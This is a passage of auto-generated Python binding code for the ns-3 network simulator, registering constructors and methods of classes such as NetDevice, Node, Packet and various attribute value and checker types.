cls.add_constructor([])
## ipv6-address.h (module 'network'): ns3::Ipv6PrefixChecker::Ipv6PrefixChecker(ns3::Ipv6PrefixChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv6PrefixChecker const &', 'arg0')])
return
def register_Ns3Ipv6PrefixValue_methods(root_module, cls):
## ipv6-address.h (module 'network'): ns3::Ipv6PrefixValue::Ipv6PrefixValue() [constructor]
cls.add_constructor([])
## ipv6-address.h (module 'network'): ns3::Ipv6PrefixValue::Ipv6PrefixValue(ns3::Ipv6PrefixValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv6PrefixValue const &', 'arg0')])
## ipv6-address.h (module 'network'): ns3::Ipv6PrefixValue::Ipv6PrefixValue(ns3::Ipv6Prefix const & value) [constructor]
cls.add_constructor([param('ns3::Ipv6Prefix const &', 'value')])
## ipv6-address.h (module 'network'): ns3::Ptr<ns3::AttributeValue> ns3::Ipv6PrefixValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6PrefixValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## ipv6-address.h (module 'network'): ns3::Ipv6Prefix ns3::Ipv6PrefixValue::Get() const [member function]
cls.add_method('Get',
'ns3::Ipv6Prefix',
[],
is_const=True)
## ipv6-address.h (module 'network'): std::string ns3::Ipv6PrefixValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## ipv6-address.h (module 'network'): void ns3::Ipv6PrefixValue::Set(ns3::Ipv6Prefix const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::Ipv6Prefix const &', 'value')])
return
def register_Ns3Mac48AddressChecker_methods(root_module, cls):
## mac48-address.h (module 'network'): ns3::Mac48AddressChecker::Mac48AddressChecker() [constructor]
cls.add_constructor([])
## mac48-address.h (module 'network'): ns3::Mac48AddressChecker::Mac48AddressChecker(ns3::Mac48AddressChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Mac48AddressChecker const &', 'arg0')])
return
def register_Ns3Mac48AddressValue_methods(root_module, cls):
## mac48-address.h (module 'network'): ns3::Mac48AddressValue::Mac48AddressValue() [constructor]
cls.add_constructor([])
## mac48-address.h (module 'network'): ns3::Mac48AddressValue::Mac48AddressValue(ns3::Mac48AddressValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Mac48AddressValue const &', 'arg0')])
## mac48-address.h (module 'network'): ns3::Mac48AddressValue::Mac48AddressValue(ns3::Mac48Address const & value) [constructor]
cls.add_constructor([param('ns3::Mac48Address const &', 'value')])
## mac48-address.h (module 'network'): ns3::Ptr<ns3::AttributeValue> ns3::Mac48AddressValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## mac48-address.h (module 'network'): bool ns3::Mac48AddressValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## mac48-address.h (module 'network'): ns3::Mac48Address ns3::Mac48AddressValue::Get() const [member function]
cls.add_method('Get',
'ns3::Mac48Address',
[],
is_const=True)
## mac48-address.h (module 'network'): std::string ns3::Mac48AddressValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## mac48-address.h (module 'network'): void ns3::Mac48AddressValue::Set(ns3::Mac48Address const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::Mac48Address const &', 'value')])
return
def register_Ns3NetDevice_methods(root_module, cls):
## net-device.h (module 'network'): ns3::NetDevice::NetDevice() [constructor]
cls.add_constructor([])
## net-device.h (module 'network'): ns3::NetDevice::NetDevice(ns3::NetDevice const & arg0) [copy constructor]
cls.add_constructor([param('ns3::NetDevice const &', 'arg0')])
## net-device.h (module 'network'): void ns3::NetDevice::AddLinkChangeCallback(ns3::Callback<void,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> callback) [member function]
cls.add_method('AddLinkChangeCallback',
'void',
[param('ns3::Callback< void, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'callback')],
is_pure_virtual=True, is_virtual=True)
## net-device.h (module 'network'): ns3::Address ns3::NetDevice::GetAddress() const [member function]
cls.add_method('GetAddress',
'ns3::Address',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): ns3::Address ns3::NetDevice::GetBroadcast() const [member function]
cls.add_method('GetBroadcast',
'ns3::Address',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): ns3::Ptr<ns3::Channel> ns3::NetDevice::GetChannel() const [member function]
cls.add_method('GetChannel',
'ns3::Ptr< ns3::Channel >',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): uint32_t ns3::NetDevice::GetIfIndex() const [member function]
cls.add_method('GetIfIndex',
'uint32_t',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): uint16_t ns3::NetDevice::GetMtu() const [member function]
cls.add_method('GetMtu',
'uint16_t',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): ns3::Address ns3::NetDevice::GetMulticast(ns3::Ipv4Address multicastGroup) const [member function]
cls.add_method('GetMulticast',
'ns3::Address',
[param('ns3::Ipv4Address', 'multicastGroup')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): ns3::Address ns3::NetDevice::GetMulticast(ns3::Ipv6Address addr) const [member function]
cls.add_method('GetMulticast',
'ns3::Address',
[param('ns3::Ipv6Address', 'addr')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): ns3::Ptr<ns3::Node> ns3::NetDevice::GetNode() const [member function]
cls.add_method('GetNode',
'ns3::Ptr< ns3::Node >',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): static ns3::TypeId ns3::NetDevice::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## net-device.h (module 'network'): bool ns3::NetDevice::IsBridge() const [member function]
cls.add_method('IsBridge',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): bool ns3::NetDevice::IsBroadcast() const [member function]
cls.add_method('IsBroadcast',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): bool ns3::NetDevice::IsLinkUp() const [member function]
cls.add_method('IsLinkUp',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): bool ns3::NetDevice::IsMulticast() const [member function]
cls.add_method('IsMulticast',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): bool ns3::NetDevice::IsPointToPoint() const [member function]
cls.add_method('IsPointToPoint',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): bool ns3::NetDevice::NeedsArp() const [member function]
cls.add_method('NeedsArp',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): bool ns3::NetDevice::Send(ns3::Ptr<ns3::Packet> packet, ns3::Address const & dest, uint16_t protocolNumber) [member function]
cls.add_method('Send',
'bool',
[param('ns3::Ptr< ns3::Packet >', 'packet'), param('ns3::Address const &', 'dest'), param('uint16_t', 'protocolNumber')],
is_pure_virtual=True, is_virtual=True)
## net-device.h (module 'network'): bool ns3::NetDevice::SendFrom(ns3::Ptr<ns3::Packet> packet, ns3::Address const & source, ns3::Address const & dest, uint16_t protocolNumber) [member function]
cls.add_method('SendFrom',
'bool',
[param('ns3::Ptr< ns3::Packet >', 'packet'), param('ns3::Address const &', 'source'), param('ns3::Address const &', 'dest'), param('uint16_t', 'protocolNumber')],
is_pure_virtual=True, is_virtual=True)
## net-device.h (module 'network'): void ns3::NetDevice::SetAddress(ns3::Address address) [member function]
cls.add_method('SetAddress',
'void',
[param('ns3::Address', 'address')],
is_pure_virtual=True, is_virtual=True)
## net-device.h (module 'network'): void ns3::NetDevice::SetIfIndex(uint32_t const index) [member function]
cls.add_method('SetIfIndex',
'void',
[param('uint32_t const', 'index')],
is_pure_virtual=True, is_virtual=True)
## net-device.h (module 'network'): bool ns3::NetDevice::SetMtu(uint16_t const mtu) [member function]
cls.add_method('SetMtu',
'bool',
[param('uint16_t const', 'mtu')],
is_pure_virtual=True, is_virtual=True)
## net-device.h (module 'network'): void ns3::NetDevice::SetNode(ns3::Ptr<ns3::Node> node) [member function]
cls.add_method('SetNode',
'void',
[param('ns3::Ptr< ns3::Node >', 'node')],
is_pure_virtual=True, is_virtual=True)
## net-device.h (module 'network'): void ns3::NetDevice::SetPromiscReceiveCallback(ns3::Callback<bool,ns3::Ptr<ns3::NetDevice>,ns3::Ptr<const ns3::Packet>,short unsigned int,const ns3::Address&,const ns3::Address&,ns3::NetDevice::PacketType,ns3::empty,ns3::empty,ns3::empty> cb) [member function]
cls.add_method('SetPromiscReceiveCallback',
'void',
[param('ns3::Callback< bool, ns3::Ptr< ns3::NetDevice >, ns3::Ptr< ns3::Packet const >, short unsigned int, ns3::Address const &, ns3::Address const &, ns3::NetDevice::PacketType, ns3::empty, ns3::empty, ns3::empty >', 'cb')],
is_pure_virtual=True, is_virtual=True)
## net-device.h (module 'network'): void ns3::NetDevice::SetReceiveCallback(ns3::Callback<bool,ns3::Ptr<ns3::NetDevice>,ns3::Ptr<const ns3::Packet>,short unsigned int,const ns3::Address&,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> cb) [member function]
cls.add_method('SetReceiveCallback',
'void',
[param('ns3::Callback< bool, ns3::Ptr< ns3::NetDevice >, ns3::Ptr< ns3::Packet const >, short unsigned int, ns3::Address const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'cb')],
is_pure_virtual=True, is_virtual=True)
## net-device.h (module 'network'): bool ns3::NetDevice::SupportsSendFrom() const [member function]
cls.add_method('SupportsSendFrom',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3NixVector_methods(root_module, cls):
cls.add_output_stream_operator()
## nix-vector.h (module 'network'): ns3::NixVector::NixVector() [constructor]
cls.add_constructor([])
## nix-vector.h (module 'network'): ns3::NixVector::NixVector(ns3::NixVector const & o) [copy constructor]
cls.add_constructor([param('ns3::NixVector const &', 'o')])
## nix-vector.h (module 'network'): void ns3::NixVector::AddNeighborIndex(uint32_t newBits, uint32_t numberOfBits) [member function]
cls.add_method('AddNeighborIndex',
'void',
[param('uint32_t', 'newBits'), param('uint32_t', 'numberOfBits')])
## nix-vector.h (module 'network'): uint32_t ns3::NixVector::BitCount(uint32_t numberOfNeighbors) const [member function]
cls.add_method('BitCount',
'uint32_t',
[param('uint32_t', 'numberOfNeighbors')],
is_const=True)
## nix-vector.h (module 'network'): ns3::Ptr<ns3::NixVector> ns3::NixVector::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::NixVector >',
[],
is_const=True)
## nix-vector.h (module 'network'): uint32_t ns3::NixVector::Deserialize(uint32_t const * buffer, uint32_t size) [member function]
cls.add_method('Deserialize',
'uint32_t',
[param('uint32_t const *', 'buffer'), param('uint32_t', 'size')])
## nix-vector.h (module 'network'): uint32_t ns3::NixVector::ExtractNeighborIndex(uint32_t numberOfBits) [member function]
cls.add_method('ExtractNeighborIndex',
'uint32_t',
[param('uint32_t', 'numberOfBits')])
## nix-vector.h (module 'network'): uint32_t ns3::NixVector::GetRemainingBits() [member function]
cls.add_method('GetRemainingBits',
'uint32_t',
[])
## nix-vector.h (module 'network'): uint32_t ns3::NixVector::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True)
## nix-vector.h (module 'network'): uint32_t ns3::NixVector::Serialize(uint32_t * buffer, uint32_t maxSize) const [member function]
cls.add_method('Serialize',
'uint32_t',
[param('uint32_t *', 'buffer'), param('uint32_t', 'maxSize')],
is_const=True)
return
def register_Ns3Node_methods(root_module, cls):
## node.h (module 'network'): ns3::Node::Node(ns3::Node const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Node const &', 'arg0')])
## node.h (module 'network'): ns3::Node::Node() [constructor]
cls.add_constructor([])
## node.h (module 'network'): ns3::Node::Node(uint32_t systemId) [constructor]
cls.add_constructor([param('uint32_t', 'systemId')])
## node.h (module 'network'): uint32_t ns3::Node::AddApplication(ns3::Ptr<ns3::Application> application) [member function]
cls.add_method('AddApplication',
'uint32_t',
[param('ns3::Ptr< ns3::Application >', 'application')])
## node.h (module 'network'): uint32_t ns3::Node::AddDevice(ns3::Ptr<ns3::NetDevice> device) [member function]
cls.add_method('AddDevice',
'uint32_t',
[param('ns3::Ptr< ns3::NetDevice >', 'device')])
## node.h (module 'network'): static bool ns3::Node::ChecksumEnabled() [member function]
cls.add_method('ChecksumEnabled',
'bool',
[],
is_static=True)
## node.h (module 'network'): ns3::Ptr<ns3::Application> ns3::Node::GetApplication(uint32_t index) const [member function]
cls.add_method('GetApplication',
'ns3::Ptr< ns3::Application >',
[param('uint32_t', 'index')],
is_const=True)
## node.h (module 'network'): ns3::Ptr<ns3::NetDevice> ns3::Node::GetDevice(uint32_t index) const [member function]
cls.add_method('GetDevice',
'ns3::Ptr< ns3::NetDevice >',
[param('uint32_t', 'index')],
is_const=True)
## node.h (module 'network'): uint32_t ns3::Node::GetId() const [member function]
cls.add_method('GetId',
'uint32_t',
[],
is_const=True)
## node.h (module 'network'): uint32_t ns3::Node::GetNApplications() const [member function]
cls.add_method('GetNApplications',
'uint32_t',
[],
is_const=True)
## node.h (module 'network'): uint32_t ns3::Node::GetNDevices() const [member function]
cls.add_method('GetNDevices',
'uint32_t',
[],
is_const=True)
## node.h (module 'network'): uint32_t ns3::Node::GetSystemId() const [member function]
cls.add_method('GetSystemId',
'uint32_t',
[],
is_const=True)
## node.h (module 'network'): static ns3::TypeId ns3::Node::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## node.h (module 'network'): void ns3::Node::RegisterDeviceAdditionListener(ns3::Callback<void,ns3::Ptr<ns3::NetDevice>,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> listener) [member function]
cls.add_method('RegisterDeviceAdditionListener',
'void',
[param('ns3::Callback< void, ns3::Ptr< ns3::NetDevice >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'listener')])
## node.h (module 'network'): void ns3::Node::RegisterProtocolHandler(ns3::Callback<void, ns3::Ptr<ns3::NetDevice>, ns3::Ptr<ns3::Packet const>, unsigned short, ns3::Address const&, ns3::Address const&, ns3::NetDevice::PacketType, ns3::empty, ns3::empty, ns3::empty> handler, uint16_t protocolType, ns3::Ptr<ns3::NetDevice> device, bool promiscuous=false) [member function]
cls.add_method('RegisterProtocolHandler',
'void',
[param('ns3::Callback< void, ns3::Ptr< ns3::NetDevice >, ns3::Ptr< ns3::Packet const >, unsigned short, ns3::Address const &, ns3::Address const &, ns3::NetDevice::PacketType, ns3::empty, ns3::empty, ns3::empty >', 'handler'), param('uint16_t', 'protocolType'), param('ns3::Ptr< ns3::NetDevice >', 'device'), param('bool', 'promiscuous', default_value='false')])
## node.h (module 'network'): void ns3::Node::UnregisterDeviceAdditionListener(ns3::Callback<void,ns3::Ptr<ns3::NetDevice>,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> listener) [member function]
cls.add_method('UnregisterDeviceAdditionListener',
'void',
[param('ns3::Callback< void, ns3::Ptr< ns3::NetDevice >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'listener')])
## node.h (module 'network'): void ns3::Node::UnregisterProtocolHandler(ns3::Callback<void, ns3::Ptr<ns3::NetDevice>, ns3::Ptr<ns3::Packet const>, unsigned short, ns3::Address const&, ns3::Address const&, ns3::NetDevice::PacketType, ns3::empty, ns3::empty, ns3::empty> handler) [member function]
cls.add_method('UnregisterProtocolHandler',
'void',
[param('ns3::Callback< void, ns3::Ptr< ns3::NetDevice >, ns3::Ptr< ns3::Packet const >, unsigned short, ns3::Address const &, ns3::Address const &, ns3::NetDevice::PacketType, ns3::empty, ns3::empty, ns3::empty >', 'handler')])
## node.h (module 'network'): void ns3::Node::DoDispose() [member function]
cls.add_method('DoDispose',
'void',
[],
visibility='protected', is_virtual=True)
## node.h (module 'network'): void ns3::Node::DoStart() [member function]
cls.add_method('DoStart',
'void',
[],
visibility='protected', is_virtual=True)
return
def register_Ns3ObjectFactoryChecker_methods(root_module, cls):
## object-factory.h (module 'core'): ns3::ObjectFactoryChecker::ObjectFactoryChecker() [constructor]
cls.add_constructor([])
## object-factory.h (module 'core'): ns3::ObjectFactoryChecker::ObjectFactoryChecker(ns3::ObjectFactoryChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ObjectFactoryChecker const &', 'arg0')])
return
def register_Ns3ObjectFactoryValue_methods(root_module, cls):
## object-factory.h (module 'core'): ns3::ObjectFactoryValue::ObjectFactoryValue() [constructor]
cls.add_constructor([])
## object-factory.h (module 'core'): ns3::ObjectFactoryValue::ObjectFactoryValue(ns3::ObjectFactoryValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ObjectFactoryValue const &', 'arg0')])
## object-factory.h (module 'core'): ns3::ObjectFactoryValue::ObjectFactoryValue(ns3::ObjectFactory const & value) [constructor]
cls.add_constructor([param('ns3::ObjectFactory const &', 'value')])
## object-factory.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::ObjectFactoryValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## object-factory.h (module 'core'): bool ns3::ObjectFactoryValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## object-factory.h (module 'core'): ns3::ObjectFactory ns3::ObjectFactoryValue::Get() const [member function]
cls.add_method('Get',
'ns3::ObjectFactory',
[],
is_const=True)
## object-factory.h (module 'core'): std::string ns3::ObjectFactoryValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## object-factory.h (module 'core'): void ns3::ObjectFactoryValue::Set(ns3::ObjectFactory const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::ObjectFactory const &', 'value')])
return
def register_Ns3OutputStreamWrapper_methods(root_module, cls):
## output-stream-wrapper.h (module 'network'): ns3::OutputStreamWrapper::OutputStreamWrapper(ns3::OutputStreamWrapper const & arg0) [copy constructor]
cls.add_constructor([param('ns3::OutputStreamWrapper const &', 'arg0')])
## output-stream-wrapper.h (module 'network'): ns3::OutputStreamWrapper::OutputStreamWrapper(std::string filename, std::_Ios_Openmode filemode) [constructor]
cls.add_constructor([param('std::string', 'filename'), param('std::_Ios_Openmode', 'filemode')])
## output-stream-wrapper.h (module 'network'): ns3::OutputStreamWrapper::OutputStreamWrapper(std::ostream * os) [constructor]
cls.add_constructor([param('std::ostream *', 'os')])
## output-stream-wrapper.h (module 'network'): std::ostream * ns3::OutputStreamWrapper::GetStream() [member function]
cls.add_method('GetStream',
'std::ostream *',
[])
return
def register_Ns3Packet_methods(root_module, cls):
cls.add_output_stream_operator()
## packet.h (module 'network'): ns3::Packet::Packet() [constructor]
cls.add_constructor([])
## packet.h (module 'network'): ns3::Packet::Packet(ns3::Packet const & o) [copy constructor]
cls.add_constructor([param('ns3::Packet const &', 'o')])
## packet.h (module 'network'): ns3::Packet::Packet(uint32_t size) [constructor]
cls.add_constructor([param('uint32_t', 'size')])
## packet.h (module 'network'): ns3::Packet::Packet(uint8_t const * buffer, uint32_t size, bool magic) [constructor]
cls.add_constructor([param('uint8_t const *', 'buffer'), param('uint32_t', 'size'), param('bool', 'magic')])
## packet.h (module 'network'): ns3::Packet::Packet(uint8_t const * buffer, uint32_t size) [constructor]
cls.add_constructor([param('uint8_t const *', 'buffer'), param('uint32_t', 'size')])
## packet.h (module 'network'): void ns3::Packet::AddAtEnd(ns3::Ptr<const ns3::Packet> packet) [member function]
cls.add_method('AddAtEnd',
'void',
[param('ns3::Ptr< ns3::Packet const >', 'packet')])
## packet.h (module 'network'): void ns3::Packet::AddByteTag(ns3::Tag const & tag) const [member function]
cls.add_method('AddByteTag',
'void',
[param('ns3::Tag const &', 'tag')],
is_const=True)
## packet.h (module 'network'): void ns3::Packet::AddHeader(ns3::Header const & header) [member function]
cls.add_method('AddHeader',
'void',
[param('ns3::Header const &', 'header')])
## packet.h (module 'network'): void ns3::Packet::AddPacketTag(ns3::Tag const & tag) const [member function]
cls.add_method('AddPacketTag',
'void',
[param('ns3::Tag const &', 'tag')],
is_const=True)
## packet.h (module 'network'): void ns3::Packet::AddPaddingAtEnd(uint32_t size) [member function]
cls.add_method('AddPaddingAtEnd',
'void',
[param('uint32_t', 'size')])
## packet.h (module 'network'): void ns3::Packet::AddTrailer(ns3::Trailer const & trailer) [member function]
cls.add_method('AddTrailer',
'void',
[param('ns3::Trailer const &', 'trailer')])
## packet.h (module 'network'): ns3::PacketMetadata::ItemIterator ns3::Packet::BeginItem() const [member function]
cls.add_method('BeginItem',
'ns3::PacketMetadata::ItemIterator',
[],
is_const=True)
## packet.h (module 'network'): ns3::Ptr<ns3::Packet> ns3::Packet::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::Packet >',
[],
is_const=True)
## packet.h (module 'network'): uint32_t ns3::Packet::CopyData(uint8_t * buffer, uint32_t size) const [member function]
cls.add_method('CopyData',
'uint32_t',
[param('uint8_t *', 'buffer'), param('uint32_t', 'size')],
is_const=True)
## packet.h (module 'network'): void ns3::Packet::CopyData(std::ostream * os, uint32_t size) const [member function]
cls.add_method('CopyData',
'void',
[param('std::ostream *', 'os'), param('uint32_t', 'size')],
is_const=True)
## packet.h (module 'network'): ns3::Ptr<ns3::Packet> ns3::Packet::CreateFragment(uint32_t start, uint32_t length) const [member function]
cls.add_method('CreateFragment',
'ns3::Ptr< ns3::Packet >',
[param('uint32_t', 'start'), param('uint32_t', 'length')],
is_const=True)
## packet.h (module 'network'): static void ns3::Packet::EnableChecking() [member function]
cls.add_method('EnableChecking',
'void',
[],
is_static=True)
## packet.h (module 'network'): static void ns3::Packet::EnablePrinting() [member function]
cls.add_method('EnablePrinting',
'void',
[],
is_static=True)
## packet.h (module 'network'): bool ns3::Packet::FindFirstMatchingByteTag(ns3::Tag & tag) const [member function]
cls.add_method('FindFirstMatchingByteTag',
'bool',
[param('ns3::Tag &', 'tag')],
is_const=True)
## packet.h (module 'network'): ns3::ByteTagIterator ns3::Packet::GetByteTagIterator() const [member function]
cls.add_method('GetByteTagIterator',
'ns3::ByteTagIterator',
[],
is_const=True)
## packet.h (module 'network'): ns3::Ptr<ns3::NixVector> ns3::Packet::GetNixVector() const [member function]
cls.add_method('GetNixVector',
'ns3::Ptr< ns3::NixVector >',
[],
is_const=True)
## packet.h (module 'network'): ns3::PacketTagIterator ns3::Packet::GetPacketTagIterator() const [member function]
cls.add_method('GetPacketTagIterator',
'ns3::PacketTagIterator',
[],
is_const=True)
## packet.h (module 'network'): uint32_t ns3::Packet::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True)
## packet.h (module 'network'): uint32_t ns3::Packet::GetSize() const [member function]
cls.add_method('GetSize',
'uint32_t',
[],
is_const=True)
## packet.h (module 'network'): uint64_t ns3::Packet::GetUid() const [member function]
cls.add_method('GetUid',
'uint64_t',
[],
is_const=True)
## packet.h (module 'network'): uint8_t const * ns3::Packet::PeekData() const [member function]
cls.add_method('PeekData',
'uint8_t const *',
[],
deprecated=True, is_const=True)
## packet.h (module 'network'): uint32_t ns3::Packet::PeekHeader(ns3::Header & header) const [member function]
cls.add_method('PeekHeader',
'uint32_t',
[param('ns3::Header &', 'header')],
is_const=True)
## packet.h (module 'network'): bool ns3::Packet::PeekPacketTag(ns3::Tag & tag) const [member function]
cls.add_method('PeekPacketTag',
'bool',
[param('ns3::Tag &', 'tag')],
is_const=True)
## packet.h (module 'network'): uint32_t ns3::Packet::PeekTrailer(ns3::Trailer & trailer) [member function]
cls.add_method('PeekTrailer',
'uint32_t',
[param('ns3::Trailer &', 'trailer')])
## packet.h (module 'network'): void ns3::Packet::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True)
## packet.h (module 'network'): void ns3::Packet::PrintByteTags(std::ostream & os) const [member function]
cls.add_method('PrintByteTags',
'void',
[param('std::ostream &', 'os')],
is_const=True)
## packet.h (module 'network'): void ns3::Packet::PrintPacketTags(std::ostream & os) const [member function]
cls.add_method('PrintPacketTags',
'void',
[param('std::ostream &', 'os')],
is_const=True)
## packet.h (module 'network'): void ns3::Packet::RemoveAllByteTags() [member function]
cls.add_method('RemoveAllByteTags',
'void',
[])
## packet.h (module 'network'): void ns3::Packet::RemoveAllPacketTags() [member function]
cls.add_method('RemoveAllPacketTags',
'void',
[])
## packet.h (module 'network'): void ns3::Packet::RemoveAtEnd(uint32_t size) [member function]
cls.add_method('RemoveAtEnd',
'void',
[param('uint32_t', 'size')])
## packet.h (module 'network'): void ns3::Packet::RemoveAtStart(uint32_t size) [member function]
cls.add_method('RemoveAtStart',
'void',
[param('uint32_t', 'size')])
## packet.h (module 'network'): uint32_t ns3::Packet::RemoveHeader(ns3::Header & header) [member function]
cls.add_method('RemoveHeader',
'uint32_t',
[param('ns3::Header &', 'header')])
## packet.h (module 'network'): bool ns3::Packet::RemovePacketTag(ns3::Tag & tag) [member function]
cls.add_method('RemovePacketTag',
'bool',
[param('ns3::Tag &', 'tag')])
## packet.h (module 'network'): uint32_t ns3::Packet::RemoveTrailer(ns3::Trailer & trailer) [member function]
cls.add_method('RemoveTrailer',
'uint32_t',
[param('ns3::Trailer &', 'trailer')])
## packet.h (module 'network'): uint32_t ns3::Packet::Serialize(uint8_t * buffer, uint32_t maxSize) const [member function]
cls.add_method('Serialize',
'uint32_t',
[param('uint8_t *', 'buffer'), param('uint32_t', 'maxSize')],
is_const=True)
## packet.h (module 'network'): void ns3::Packet::SetNixVector(ns3::Ptr<ns3::NixVector> arg0) [member function]
cls.add_method('SetNixVector',
'void',
[param('ns3::Ptr< ns3::NixVector >', 'arg0')])
return
def register_Ns3TimeChecker_methods(root_module, cls):
## nstime.h (module 'core'): ns3::TimeChecker::TimeChecker() [constructor]
cls.add_constructor([])
## nstime.h (module 'core'): ns3::TimeChecker::TimeChecker(ns3::TimeChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TimeChecker const &', 'arg0')])
return
def register_Ns3TimeValue_methods(root_module, cls):
## nstime.h (module 'core'): ns3::TimeValue::TimeValue() [constructor]
cls.add_constructor([])
## nstime.h (module 'core'): ns3::TimeValue::TimeValue(ns3::TimeValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TimeValue const &', 'arg0')])
## nstime.h (module 'core'): ns3::TimeValue::TimeValue(ns3::Time const & value) [constructor]
cls.add_constructor([param('ns3::Time const &', 'value')])
## nstime.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::TimeValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## nstime.h (module 'core'): bool ns3::TimeValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## nstime.h (module 'core'): ns3::Time ns3::TimeValue::Get() const [member function]
cls.add_method('Get',
'ns3::Time',
[],
is_const=True)
## nstime.h (module 'core'): std::string ns3::TimeValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## nstime.h (module 'core'): void ns3::TimeValue::Set(ns3::Time const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::Time const &', 'value')])
return
def register_Ns3TypeIdChecker_methods(root_module, cls):
## type-id.h (module 'core'): ns3::TypeIdChecker::TypeIdChecker() [constructor]
cls.add_constructor([])
## type-id.h (module 'core'): ns3::TypeIdChecker::TypeIdChecker(ns3::TypeIdChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TypeIdChecker const &', 'arg0')])
return
def register_Ns3TypeIdValue_methods(root_module, cls):
